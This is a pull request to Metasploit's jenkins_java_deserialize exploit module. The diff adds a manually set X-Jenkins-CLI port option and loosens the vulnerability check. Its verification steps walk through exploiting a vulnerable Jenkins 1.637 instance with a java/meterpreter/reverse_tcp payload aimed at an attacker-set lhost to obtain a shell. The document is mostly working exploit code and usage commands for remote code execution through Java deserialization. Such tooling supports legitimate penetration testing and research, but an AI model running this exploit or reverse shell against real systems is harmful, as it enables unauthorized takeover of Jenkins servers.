### PR TITLE
Resolve #6546, support manual configuration for X-Jenkins-CLI-Port for jenkins_java_deserialize

### DIFF
--- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb
+++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    unless cli_port || vulnerable?
+    if cli_port == 0 && !vulnerable?
       fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
     end
     invoke_remote_method(set_payload)

--- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb
+++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb
@@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
       OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
       Opt::RPORT('8080')
     ], self.class)
+
+    register_advanced_options([
+      OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
+    ], self.class)
+  end
+
+  def cli_port
+    @jenkins_cli_port || datastore['XJenkinsCliPort']
   end
 
   def exploit
-    unless vulnerable?
+    unless cli_port || vulnerable?
       fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
     end
     invoke_remote_method(set_payload)
@@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def invoke_remote_method(serialized_java_stream)
     begin
-      socket = connect(true, {'RPORT' => @jenkins_cli_port})
+      socket = connect(true, {'RPORT' => cli_port})
 
       print_status 'Sending headers...'
       socket.put(read_bin_file('serialized_jenkins_header'))


### PR DESCRIPTION
## What This Patch Does

This patch allows the user to be able to configure the X-Jenkins-CLI port for module jenkins_java_deserialize, because according to a community report, apparently it's not always possible to grab this info automatically from the HTTP header even though the service is up.

Resolves #6546
## Verification Steps
- [x] Start a Ubuntu box
- [x] Do: `wget http://mirrors.jenkins-ci.org/war/1.637/jenkins.war`
- [x] Do: `java -jar jenkins.war`. Jenkins should start listening at this point.
- [x] Start msfconsole
- [x] Do: `use exploit/linux/misc/jenkins_java_deserialize`
- [x] Do: `set rhost [IP]`
- [x] Do: `set payload java/meterpreter/reverse_tcp`
- [x] Do: `set lhost [IP]`
- [ ] Do: `run`, and you should get a shell. If not, try to rerun.
- [ ] By default, the the vulnerable service should tell the exploit where the CLI port is, and you should get a session.
- [ ] exit the session.
- [x] Do: `set XJenkinsCliPort 1111`
- [x] Do: `run`
- [x] This time you should see this error: `Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.202:1111).`
